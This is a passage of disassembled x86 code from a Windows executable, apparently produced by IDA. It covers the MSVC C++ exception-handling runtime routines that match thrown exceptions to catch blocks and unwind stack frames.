		inc	[ebp+var_8]
		mov	eax, [ebp+var_8]
		cmp	eax, [edi]
		jl	short loc_40BA1E
		pop	esi
		pop	ebx

loc_40BA6F:				; CODE XREF: sub_40B9FB+1Fj
		mov	al, [ebp+var_1]
		leave
		retn
sub_40B9FB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40BA74	proc near		; CODE XREF: sub_40BFC7+30Ap
		push	4
		mov	eax, offset loc_41CD7E
		call	sub_404BBF
		call	sub_40595D
		cmp	dword ptr [eax+94h], 0
		jz	short loc_40BA93
		call	sub_40C465

loc_40BA93:				; CODE XREF: sub_40BA74+18j
		and	dword ptr [ebp-4], 0
		call	sub_40C452
		or	dword ptr [ebp-4], 0FFFFFFFFh
		jmp	sub_40C419
sub_40BA74	endp


; =============== S U B	R O U T	I N E =======================================



sub_40BAA5	proc near		; DATA XREF: zcrshv4o:00422B80o
		call	sub_40595D
		mov	ecx, [ebp+8]
		push	0
		push	0
		mov	[eax+94h], ecx
		call	sub_40477B
		int	3		; Trap to Debugger
sub_40BAA5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BABD	proc near		; CODE XREF: sub_40BE69+57p

var_3C		= byte ptr -3Ch
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

; FUNCTION CHUNK AT 0040BBD8 SIZE 00000005 BYTES

		push	2Ch
		push	offset dword_422BD0
		call	__SEH_prolog4
		mov	ebx, ecx
		mov	edi, [ebp+arg_4]
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_1C], ebx
		and	[ebp+var_34], 0
		mov	eax, [edi-4]
		mov	[ebp+var_24], eax
		push	dword ptr [esi+18h]
		lea	eax, [ebp+var_3C]
		push	eax
		call	sub_404A99
		pop	ecx
		pop	ecx
		mov	[ebp+var_28], eax
		call	sub_40595D
		mov	eax, [eax+88h]
		mov	[ebp+var_2C], eax
		call	sub_40595D
		mov	eax, [eax+8Ch]
		mov	[ebp+var_30], eax
		call	sub_40595D
		mov	[eax+88h], esi
		call	sub_40595D
		mov	ecx, [ebp+arg_8]
		mov	[eax+8Ch], ecx
		and	[ebp+ms_exc.disabled], 0
		xor	eax, eax
		inc	eax
		mov	[ebp+arg_8], eax
		mov	[ebp+ms_exc.disabled], eax
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	ebx
		push	[ebp+arg_C]
		push	edi
		call	sub_404B2E
		add	esp, 14h
		mov	[ebp+var_1C], eax
		and	[ebp+ms_exc.disabled], 0
		jmp	short loc_40BBBC
; ---------------------------------------------------------------------------

loc_40BB4D:				; DATA XREF: zcrshv4o:00422BF0o
		mov	eax, [ebp+ms_exc.exc_ptr]
		call	sub_40B93D
		retn
; ---------------------------------------------------------------------------

loc_40BB56:				; DATA XREF: zcrshv4o:00422BF4o
		mov	esp, [ebp+ms_exc.old_esp]
		call	sub_40595D
		and	dword ptr [eax+20Ch], 0
		mov	esi, [ebp+arg_C]
		mov	edi, [ebp+arg_4]
		cmp	dword ptr [esi+4], 80h
		jg	short loc_40BB7A
		movsx	ecx, byte ptr [edi+8]
		jmp	short loc_40BB7D
; ---------------------------------------------------------------------------

loc_40BB7A:				; CODE XREF: sub_40BABD+B5j
		mov	ecx, [edi+8]

loc_40BB7D:				; CODE XREF: sub_40BABD+BBj
		mov	ebx, [esi+10h]
		and	[ebp+var_20], 0

loc_40BB84:				; CODE XREF: sub_40BABD+11Ej
		mov	eax, [ebp+var_20]
		cmp	eax, [esi+0Ch]
		jnb	short loc_40BBA4
		imul	eax, 14h
		add	eax, ebx
		mov	edx, [eax+4]
		cmp	ecx, edx
		jle	short loc_40BBD8
		cmp	ecx, [eax+8]
		jg	short loc_40BBD8
		mov	eax, [esi+8]
		mov	ecx, [eax+edx*8+8]

loc_40BBA4:				; CODE XREF: sub_40BABD+CDj
		push	ecx
		push	esi
		push	0
		push	edi
		call	sub_40B85C
		add	esp, 10h
		and	[ebp+var_1C], 0
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_0]

loc_40BBBC:				; CODE XREF: sub_40BABD+8Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	[ebp+arg_8], 0
		call	sub_40BBE3
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40BABD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40BABD

loc_40BBD8:				; CODE XREF: sub_40BABD+D9j
					; sub_40BABD+DEj
		inc	[ebp+var_20]
		jmp	short loc_40BB84
; END OF FUNCTION CHUNK	FOR sub_40BABD

; =============== S U B	R O U T	I N E =======================================



sub_40BBDD	proc near		; DATA XREF: zcrshv4o:00422BE8o
		mov	edi, [ebp+0Ch]
		mov	esi, [ebp+8]
sub_40BBDD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40BBE3	proc near		; CODE XREF: sub_40BABD+10Dp
		mov	eax, [ebp-24h]
		mov	[edi-4], eax
		push	dword ptr [ebp-28h]
		call	sub_404AE2
		pop	ecx
		call	sub_40595D
		mov	ecx, [ebp-2Ch]
		mov	[eax+88h], ecx
		call	sub_40595D
		mov	ecx, [ebp-30h]
		mov	[eax+8Ch], ecx
		cmp	dword ptr [esi], 0E06D7363h
		jnz	short locret_40BC58
		cmp	dword ptr [esi+10h], 3
		jnz	short locret_40BC58
		mov	eax, [esi+14h]
		cmp	eax, 19930520h
		jz	short loc_40BC34
		cmp	eax, 19930521h
		jz	short loc_40BC34
		cmp	eax, 19930522h
		jnz	short locret_40BC58

loc_40BC34:				; CODE XREF: sub_40BBE3+41j
					; sub_40BBE3+48j
		cmp	dword ptr [ebp-34h], 0
		jnz	short locret_40BC58
		cmp	dword ptr [ebp-1Ch], 0
		jz	short locret_40BC58
		push	dword ptr [esi+18h]
		call	sub_404AC1
		pop	ecx
		test	eax, eax
		jz	short locret_40BC58
		push	dword ptr [ebp+10h]
		push	esi
		call	sub_40B982
		pop	ecx
		pop	ecx

locret_40BC58:				; CODE XREF: sub_40BBE3+31j
					; sub_40BBE3+37j ...
		retn
sub_40BBE3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BC59	proc near		; CODE XREF: sub_40BDD8+36p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	0Ch
		push	offset dword_422BF8
		call	__SEH_prolog4
		xor	edx, edx
		mov	[ebp+var_1C], edx
		mov	eax, [ebp+arg_8]
		mov	ecx, [eax+4]
		cmp	ecx, edx
		jz	loc_40BDD0
		cmp	[ecx+8], dl
		jz	loc_40BDD0
		mov	ecx, [eax+8]
		cmp	ecx, edx
		jnz	short loc_40BC94
		test	dword ptr [eax], 80000000h
		jz	loc_40BDD0

loc_40BC94:				; CODE XREF: sub_40BC59+2Dj
		mov	eax, [eax]
		mov	esi, [ebp+arg_4]
		test	eax, eax
		js	short loc_40BCA1
		lea	esi, [ecx+esi+0Ch]

loc_40BCA1:				; CODE XREF: sub_40BC59+42j
		mov	[ebp+ms_exc.disabled], edx
		xor	ebx, ebx
		inc	ebx
		push	ebx
		test	al, 8
		jz	short loc_40BCED
		mov	edi, [ebp+arg_0]
		push	dword ptr [edi+18h]
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		mov	eax, [edi+18h]
		mov	[esi], eax
		mov	ecx, [ebp+arg_C]
		add	ecx, 8
		push	ecx

loc_40BCDE:				; CODE XREF: sub_40BC59+E7j
		push	eax
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		mov	[esi], eax
		jmp	loc_40BDB8
; ---------------------------------------------------------------------------

loc_40BCED:				; CODE XREF: sub_40BC59+51j
		mov	edi, [ebp+arg_C]
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		test	[edi], bl
		jz	short loc_40BD42
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_40BDB3
		push	dword ptr [edi+14h]
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		push	esi
		call	sub_407930
		add	esp, 0Ch
		cmp	dword ptr [edi+14h], 4
		jnz	loc_40BDB8
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40BDB8
		add	edi, 8
		push	edi
		jmp	short loc_40BCDE
; ---------------------------------------------------------------------------

loc_40BD42:				; CODE XREF: sub_40BC59+9Fj
		cmp	[edi+18h], edx
		jnz	short loc_40BD7F
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	dword ptr [edi+14h]
		add	edi, 8
		push	edi
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+18h]
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		push	eax
		push	esi
		call	sub_407930
		add	esp, 0Ch
		jmp	short loc_40BDB8
; ---------------------------------------------------------------------------

loc_40BD7F:				; CODE XREF: sub_40BC59+ECj
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	ebx
		push	esi
		call	sub_410770
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		push	dword ptr [edi+18h]
		call	sub_410770
		pop	ecx
		test	eax, eax
		jz	short loc_40BDB3
		test	byte ptr [edi],	4
		push	0
		pop	eax
		setnz	al
		inc	eax
		mov	[ebp+var_1C], eax
		jmp	short loc_40BDB8
; ---------------------------------------------------------------------------

loc_40BDB3:				; CODE XREF: sub_40BC59+62j
					; sub_40BC59+73j ...
		call	sub_40C465

loc_40BDB8:				; CODE XREF: sub_40BC59+8Fj
					; sub_40BC59+D7j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_1C]
		jmp	short loc_40BDD2
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40BDD0:				; CODE XREF: sub_40BC59+19j
					; sub_40BC59+22j ...
		xor	eax, eax

loc_40BDD2:				; CODE XREF: sub_40BC59+169j
		call	__SEH_epilog4
		retn
sub_40BC59	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BDD8	proc near		; CODE XREF: sub_40BE69+11p

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	8
		push	offset dword_422C18
		call	__SEH_prolog4
		mov	eax, [ebp+arg_8]
		test	dword ptr [eax], 80000000h
		jz	short loc_40BDF4
		mov	ebx, [ebp+arg_4]
		jmp	short loc_40BDFE
; ---------------------------------------------------------------------------

loc_40BDF4:				; CODE XREF: sub_40BDD8+15j
		mov	ecx, [eax+8]
		mov	edx, [ebp+arg_4]
		lea	ebx, [ecx+edx+0Ch]

loc_40BDFE:				; CODE XREF: sub_40BDD8+1Aj
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_C]
		push	esi
		push	eax
		push	[ebp+arg_4]
		mov	edi, [ebp+arg_0]
		push	edi
		call	sub_40BC59
		add	esp, 10h
		dec	eax
		jz	short loc_40BE38
		dec	eax
		jnz	short loc_40BE50
		push	1
		lea	eax, [esi+8]
		push	eax
		push	dword ptr [edi+18h]
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		push	eax
		push	dword ptr [esi+18h]
		push	ebx
		call	sub_4047F5
		jmp	short loc_40BE50
; ---------------------------------------------------------------------------

loc_40BE38:				; CODE XREF: sub_40BDD8+3Fj
		lea	eax, [esi+8]
		push	eax
		push	dword ptr [edi+18h]
		call	sub_40B9D6
		pop	ecx
		pop	ecx
		push	eax
		push	dword ptr [esi+18h]
		push	ebx
		call	sub_4047F5

loc_40BE50:				; CODE XREF: sub_40BDD8+42j
					; sub_40BDD8+5Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	__SEH_epilog4
		retn
sub_40BDD8	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		jmp	sub_40C419

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BE69	proc near		; CODE XREF: sub_40BED5+D4p
					; sub_40BFC7+25Dp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_10], 0
		jz	short loc_40BE82
		push	[ebp+arg_10]
		push	ebx
		push	esi
		push	[ebp+arg_0]
		call	sub_40BDD8
		add	esp, 10h

loc_40BE82:				; CODE XREF: sub_40BE69+7j
		cmp	[ebp+arg_18], 0
		push	[ebp+arg_0]
		jnz	short loc_40BE8E
		push	esi
		jmp	short loc_40BE91
; ---------------------------------------------------------------------------

loc_40BE8E:				; CODE XREF: sub_40BE69+20j
		push	[ebp+arg_18]

loc_40BE91:				; CODE XREF: sub_40BE69+23j
		call	sub_4047FC
		push	dword ptr [edi]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	esi
		call	sub_40B85C
		mov	eax, [edi+4]
		push	100h
		push	[ebp+arg_14]
		inc	eax
		push	[ebp+arg_C]
		mov	[esi+8], eax
		push	[ebp+arg_4]
		mov	ecx, [ebx+0Ch]
		push	esi
		push	[ebp+arg_0]
		call	sub_40BABD
		add	esp, 28h
		test	eax, eax
		jz	short loc_40BED3
		push	esi
		push	eax
		call	sub_4047C5

loc_40BED3:				; CODE XREF: sub_40BE69+61j
		pop	ebp
		retn
sub_40BE69	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BED5	proc near		; CODE XREF: sub_40BFC7+336p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		mov	esi, [ebp+arg_0]
		cmp	dword ptr [esi], 80000003h
		jz	loc_40BFC4
		push	edi
		call	sub_40595D
		cmp	dword ptr [eax+80h], 0
		jz	short loc_40BF38
		call	sub_40595D
		lea	edi, [eax+80h]
		call	sub_40574A
		cmp	[edi], eax
		jz	short loc_40BF38
		cmp	dword ptr [esi], 0E0434F4Dh
		jz	short loc_40BF38
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	esi
		call	sub_4048B4
		add	esp, 1Ch
		test	eax, eax
		jnz	loc_40BFC3

loc_40BF38:				; CODE XREF: sub_40BED5+22j
					; sub_40BED5+36j ...
		mov	edi, [ebp+arg_10]
		cmp	dword ptr [edi+0Ch], 0
		jnz	short loc_40BF46
		call	sub_40C465

loc_40BF46:				; CODE XREF: sub_40BED5+6Aj
		mov	esi, [ebp+arg_14]
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_4]
		push	eax
		push	esi
		push	[ebp+arg_18]
		push	edi
		call	sub_404A26
		mov	edi, eax
		mov	eax, [ebp+var_4]
		add	esp, 14h
		cmp	eax, [ebp+var_8]
		jnb	short loc_40BFC3
		push	ebx

loc_40BF69:				; CODE XREF: sub_40BED5+EBj
		cmp	esi, [edi]
		jl	short loc_40BFB4
		cmp	esi, [edi+4]
		jg	short loc_40BFB4
		mov	eax, [edi+0Ch]
		mov	ecx, [edi+10h]
		shl	eax, 4
		add	eax, ecx
		mov	ecx, [eax-0Ch]
		test	ecx, ecx
		jz	short loc_40BF8A
		cmp	byte ptr [ecx+8], 0
		jnz	short loc_40BFB4

loc_40BF8A:				; CODE XREF: sub_40BED5+ADj
		lea	ebx, [eax-10h]
		test	byte ptr [ebx],	40h
		jnz	short loc_40BFB4
		push	[ebp+arg_1C]
		mov	esi, [ebp+arg_4]
		push	[ebp+arg_18]
		push	0
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_40BE69
		mov	esi, [ebp+arg_14]
		add	esp, 1Ch

loc_40BFB4:				; CODE XREF: sub_40BED5+96j
					; sub_40BED5+9Bj ...
		inc	[ebp+var_4]
		mov	eax, [ebp+var_4]
		add	edi, 14h
		cmp	eax, [ebp+var_8]
		jb	short loc_40BF69
		pop	ebx

loc_40BFC3:				; CODE XREF: sub_40BED5+5Dj
					; sub_40BED5+91j
		pop	edi

loc_40BFC4:				; CODE XREF: sub_40BED5+Fj
		pop	esi
		leave
		retn
sub_40BED5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40BFC7	proc near		; CODE XREF: sub_40C335+D4p

var_2C		= dword	ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= byte ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	ecx, [ebp+arg_4]
		push	ebx
		mov	ebx, [ebp+arg_10]
		mov	eax, [ebx+4]
		cmp	eax, 80h
		push	esi
		push	edi
		mov	[ebp+var_1], 0
		jg	short loc_40BFEA
		movsx	ecx, byte ptr [ecx+8]
		jmp	short loc_40BFED
; ---------------------------------------------------------------------------

loc_40BFEA:				; CODE XREF: sub_40BFC7+1Bj
		mov	ecx, [ecx+8]

loc_40BFED:				; CODE XREF: sub_40BFC7+21j
		cmp	ecx, 0FFFFFFFFh
		mov	[ebp+var_8], ecx
		jl	short loc_40BFF9
		cmp	ecx, eax
		jl	short loc_40BFFE

loc_40BFF9:				; CODE XREF: sub_40BFC7+2Cj
		call	sub_40C465

loc_40BFFE:				; CODE XREF: sub_40BFC7+30j
		mov	esi, [ebp+arg_0]
		mov	edi, 0E06D7363h
		cmp	[esi], edi
		jnz	loc_40C2D9
		cmp	dword ptr [esi+10h], 3
		mov	ebx, 19930520h
		jnz	loc_40C146
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40C036
		cmp	eax, 19930521h
		jz	short loc_40C036
		cmp	eax, 19930522h
		jnz	loc_40C146

loc_40C036:				; CODE XREF: sub_40BFC7+5Bj
					; sub_40BFC7+62j
		cmp	dword ptr [esi+1Ch], 0
		jnz	loc_40C146
		call	sub_40595D
		cmp	dword ptr [eax+88h], 0
		jz	loc_40C318
		call	sub_40595D
		mov	esi, [eax+88h]
		mov	[ebp+arg_0], esi
		call	sub_40595D
		mov	eax, [eax+8Ch]
		push	1
		push	esi
		mov	[ebp+arg_8], eax
		call	sub_410770
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_40C081
		call	sub_40C465

loc_40C081:				; CODE XREF: sub_40BFC7+B3j
		cmp	[esi], edi
		jnz	short loc_40C0AB
		cmp	dword ptr [esi+10h], 3
		jnz	short loc_40C0AB
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40C0A0
		cmp	eax, 19930521h
		jz	short loc_40C0A0
		cmp	eax, 19930522h
		jnz	short loc_40C0AB

loc_40C0A0:				; CODE XREF: sub_40BFC7+C9j
					; sub_40BFC7+D0j
		cmp	dword ptr [esi+1Ch], 0
		jnz	short loc_40C0AB
		call	sub_40C465

loc_40C0AB:				; CODE XREF: sub_40BFC7+BCj
					; sub_40BFC7+C2j ...
		call	sub_40595D
		cmp	dword ptr [eax+94h], 0
		jz	loc_40C146
		call	sub_40595D
		mov	edi, [eax+94h]
		call	sub_40595D
		push	[ebp+arg_0]
		xor	esi, esi
		mov	[eax+94h], esi
		call	sub_40B9FB
		test	al, al
		pop	ecx
		jnz	short loc_40C13E
		xor	ebx, ebx
		cmp	[edi], ebx
		jle	short loc_40C105

loc_40C0E8:				; CODE XREF: sub_40BFC7+13Cj
		mov	eax, [edi+4]
		mov	ecx, [ebx+eax+4]
		push	offset off_424E50
		call	sub_4035A5
		test	al, al
		jnz	short loc_40C10A
		inc	esi
		add	ebx, 10h
		cmp	esi, [edi]
		jl	short loc_40C0E8

loc_40C105:				; CODE XREF: sub_40BFC7+11Fj
					; sub_40BFC7+31Cj
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40C10A:				; CODE XREF: sub_40BFC7+134j
		push	1
		push	[ebp+arg_0]
		call	sub_40B982
		pop	ecx
		pop	ecx
		lea	eax, [ebp+arg_0]
		push	eax
		lea	ecx, [ebp+var_2C]
		mov	[ebp+arg_0], offset dword_41EC4C
		call	sub_40319A
		push	offset dword_422C34
		lea	eax, [ebp+var_2C]
		push	eax
		mov	[ebp+var_2C], offset off_41EC44
		call	sub_40477B

loc_40C13E:				; CODE XREF: sub_40BFC7+119j
		mov	esi, [ebp+arg_0]
		mov	edi, 0E06D7363h

loc_40C146:				; CODE XREF: sub_40BFC7+50j
					; sub_40BFC7+69j ...
		cmp	[esi], edi
		jnz	loc_40C2D6
		cmp	dword ptr [esi+10h], 3
		jnz	loc_40C2D6
		mov	eax, [esi+14h]
		cmp	eax, ebx
		jz	short loc_40C171
		cmp	eax, 19930521h
		jz	short loc_40C171
		cmp	eax, 19930522h
		jnz	loc_40C2D6

loc_40C171:				; CODE XREF: sub_40BFC7+196j
					; sub_40BFC7+19Dj
		mov	edi, [ebp+arg_10]
		cmp	dword ptr [edi+0Ch], 0
		jbe	loc_40C23D
		lea	eax, [ebp+var_1C]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		push	[ebp+var_8]
		push	[ebp+arg_18]
		push	edi
		call	sub_404A26
		add	esp, 14h
		mov	edi, eax

loc_40C197:				; CODE XREF: sub_40BFC7+26Ej
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+var_1C]
		jnb	loc_40C23A
		mov	eax, [ebp+var_8]
		cmp	[edi], eax
		jg	loc_40C22F
		cmp	eax, [edi+4]
		jg	short loc_40C22F
		mov	eax, [edi+10h]
		mov	[ebp+var_C], eax
		mov	eax, [edi+0Ch]
		test	eax, eax
		mov	[ebp+var_18], eax
		jle	short loc_40C22F

loc_40C1C3:				; CODE XREF: sub_40BFC7+23Cj
		mov	eax, [esi+1Ch]
		mov	eax, [eax+0Ch]
		lea	ebx, [eax+4]
		mov	eax, [eax]
		test	eax, eax
		mov	[ebp+var_14], eax
		jle	short loc_40C1F8

loc_40C1D5:				; CODE XREF: sub_40BFC7+22Fj
		push	dword ptr [esi+1Ch]
		mov	eax, [ebx]
		push	eax
		push	[ebp+var_C]
		mov	[ebp+var_20], eax
		call	sub_40B7BC
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40C207
		dec	[ebp+var_14]
		add	ebx, 4
		cmp	[ebp+var_14], eax
		jg	short loc_40C1D5

loc_40C1F8:				; CODE XREF: sub_40BFC7+20Cj
		dec	[ebp+var_18]
		add	[ebp+var_C], 10h
		cmp	[ebp+var_18], 0
		jg	short loc_40C1C3
		jmp	short loc_40C22F
; ---------------------------------------------------------------------------

loc_40C207:				; CODE XREF: sub_40BFC7+224j
		push	[ebp+arg_1C]
		mov	ebx, [ebp+var_C]
		push	[ebp+arg_18]
		mov	[ebp+var_1], 1
		push	[ebp+var_20]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	esi
		mov	esi, [ebp+arg_4]
		call	sub_40BE69
		mov	esi, [ebp+arg_0]
		add	esp, 1Ch

loc_40C22F:				; CODE XREF: sub_40BFC7+1E1j
					; sub_40BFC7+1EAj ...
		inc	[ebp+var_10]
		add	edi, 14h
		jmp	loc_40C197
; ---------------------------------------------------------------------------

loc_40C23A:				; CODE XREF: sub_40BFC7+1D6j
		mov	edi, [ebp+arg_10]

loc_40C23D:				; CODE XREF: sub_40BFC7+1B1j
		cmp	[ebp+arg_14], 0
		jz	short loc_40C24D
		push	1
		push	esi
		call	sub_40B982
		pop	ecx
		pop	ecx

loc_40C24D:				; CODE XREF: sub_40BFC7+27Aj
		cmp	[ebp+var_1], 0
		jnz	loc_40C305
		mov	eax, [edi]
		and	eax, 1FFFFFFFh
		cmp	eax, 19930521h
		jb	loc_40C305
		mov	edi, [edi+1Ch]
		test	edi, edi
		jz	loc_40C305
		push	esi
		call	sub_40B9FB
		test	al, al
		pop	ecx
		jnz	loc_40C305
		call	sub_40595D
		call	sub_40595D
		call	sub_40595D
		mov	[eax+88h], esi
		call	sub_40595D
		cmp	[ebp+arg_1C], 0
		mov	ecx, [ebp+arg_8]
		mov	[eax+8Ch], ecx
		push	esi
		jnz	short loc_40C2B2
		push	[ebp+arg_4]
		jmp	short loc_40C2B5
; ---------------------------------------------------------------------------

loc_40C2B2:				; CODE XREF: sub_40BFC7+2E4j
		push	[ebp+arg_1C]

loc_40C2B5:				; CODE XREF: sub_40BFC7+2E9j
		call	sub_4047FC
		mov	esi, [ebp+arg_10]
		push	0FFFFFFFFh
		push	esi
		push	[ebp+arg_C]
		push	[ebp+arg_4]
		call	sub_40B85C
		add	esp, 10h
		push	dword ptr [esi+1Ch]
		call	sub_40BA74

loc_40C2D6:				; CODE XREF: sub_40BFC7+181j
					; sub_40BFC7+18Bj ...
		mov	ebx, [ebp+arg_10]

loc_40C2D9:				; CODE XREF: sub_40BFC7+41j
		cmp	dword ptr [ebx+0Ch], 0
		jbe	short loc_40C305
		cmp	[ebp+arg_14], 0
		jnz	loc_40C105
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+var_8]
		push	ebx
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	esi
		call	sub_40BED5
		add	esp, 20h

loc_40C305:				; CODE XREF: sub_40BFC7+28Aj
					; sub_40BFC7+29Cj ...
		call	sub_40595D
		cmp	dword ptr [eax+94h], 0
		jz	short loc_40C318
		call	sub_40C465

loc_40C318:				; CODE XREF: sub_40BFC7+85j
					; sub_40BFC7+34Aj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40BFC7	endp

; ---------------------------------------------------------------------------
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_403200
		mov	dword ptr [esi], offset	off_41EC44
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C335	proc near		; CODE XREF: sub_40484E+21p
					; .text:004048AAp ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		call	sub_40595D
		cmp	dword ptr [eax+20Ch], 0
		mov	eax, [ebp+arg_10]
		mov	ecx, [ebp+arg_0]
		mov	edi, 0E06D7363h
		mov	esi, 1FFFFFFFh
		mov	ebx, 19930522h
		jnz	short loc_40C37E
		mov	edx, [ecx]
		cmp	edx, edi
		jz	short loc_40C37E
		cmp	edx, 80000026h
		jz	short loc_40C37E
		mov	edx, [eax]
		and	edx, esi
		cmp	edx, ebx
		jb	short loc_40C37E
		test	byte ptr [eax+20h], 1
		jnz	loc_40C411

loc_40C37E:				; CODE XREF: sub_40C335+27j
					; sub_40C335+2Dj ...
		test	byte ptr [ecx+4], 66h
		jz	short loc_40C3A7
		cmp	dword ptr [eax+4], 0
		jz	loc_40C411
		cmp	[ebp+arg_14], 0
		jnz	short loc_40C411
		push	0FFFFFFFFh
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_4]
		call	sub_40B85C
		add	esp, 10h
		jmp	short loc_40C411
; ---------------------------------------------------------------------------

loc_40C3A7:				; CODE XREF: sub_40C335+4Dj
		cmp	dword ptr [eax+0Ch], 0
		jnz	short loc_40C3BF
		mov	edx, [eax]
		and	edx, esi
		cmp	edx, 19930521h
		jb	short loc_40C411
		cmp	dword ptr [eax+1Ch], 0
		jz	short loc_40C411

loc_40C3BF:				; CODE XREF: sub_40C335+76j
		cmp	[ecx], edi
		jnz	short loc_40C3F5
		cmp	dword ptr [ecx+10h], 3
		jb	short loc_40C3F5
		cmp	[ecx+14h], ebx
		jbe	short loc_40C3F5
		mov	edx, [ecx+1Ch]
		mov	edx, [edx+8]
